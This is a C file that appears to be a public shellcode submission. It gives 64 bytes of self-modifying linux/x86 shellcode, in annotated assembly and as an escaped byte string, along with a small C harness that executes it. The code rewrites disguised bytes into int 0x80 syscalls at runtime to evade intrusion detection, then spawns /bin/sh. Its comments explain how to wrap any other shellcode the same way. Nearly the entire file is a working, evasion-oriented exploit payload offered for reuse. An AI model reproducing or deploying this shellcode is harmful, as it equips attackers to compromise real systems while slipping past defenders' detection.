/*
    _  __                 __  ___      __
   | |/ /__  ____  ____  /  |/  /_  __/ /_____ _
   |   / _ \/ __ \/ __ \/ /|_/ / / / / __/ __ `/
  /   /  __/ / / / /_/ / /  / / /_/ / /_/ /_/ /
 /_/|_\___/_/ /_/\____/_/  /_/\__,_/\__/\__,_/

 xenomuta\x40phreaker\x2enet
 https://xenomuta.tuxfamily.org/ - Methylxantina 256mg

 Description:
 linux/x86 Self-modifying ShellCode for IDS evasion
 creates int $0x80 syscalls on runtime.

 OS: Linux
 Arch: x86
 Length: 64 bytes ( 35 without /bin/sh payload )
 Author: XenoMuta

 hola at:
  str0k3, garay, fr1t0l4y, emra.
  - God bless you all -

=== SOURCE CODE ====
.globl _start
_start:
  jmp _findOut  
_WhereAmI:
  pop %edx  // Save our payload's address g20
  mov %edx, %esi  // and save it 4 later 
_loopMakeInt80s:
  mov (%edx), %eax
  cmpw $0x7dca, %ax  // Find this guy ( 0x7dca ) and 
  jne _no
  addw $0x303, %ax  // 0x7dca + 0x303 == 0x80cd ( int $0x80 )
  mov %eax, (%edx)
_no:
  incb %dl
  cmp $0x41414141, %eax  // Use 'AAAA' as end Marker.
  jne _loopMakeInt80s  
  jmp *%esi    // Jump to our converted code when done
_findOut:
  call _WhereAmI
_payload:      // Paste your shell code here and then replace 
  xor %edx, %edx    // "\xcd\x80" (int $0x80) for .ascii "\xca7d" 
  push $0xb    // and end with .ascii "AAAA" as end marker 
  pop %eax
  cltd
  push %edx
  push $0x68732f2f
  push $0x6e69622f
  mov %esp, %ebx
  push %edx
  push %ebx
  mov %esp,%ecx
  .ascii "\xca\x7d" // + 0x303 = 0xcd80 (int $0x80)
  .ascii "AAAA"
=== SOURCE CODE ====
*/


char shellcode[] = "\xeb\x1c\x5a\x89\xd6\x8b\x02\x66\x3d\xca\x7d\x75\x06\x66\x05\x03\x03\x89\x02\xfe\xc2\x3d\x41\x41\x41\x41\x75\xe9\xff\xe6\xe8\xdf\xff\xff\xff\x31\xd2\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xca\x7d\x41\x41\x41\x41";

int main ()
{
  printf("Length: %d bytes\n", strlen(shellcode));
  int (*sc)() = (int (*)())shellcode;
  sc();
  return 0;
}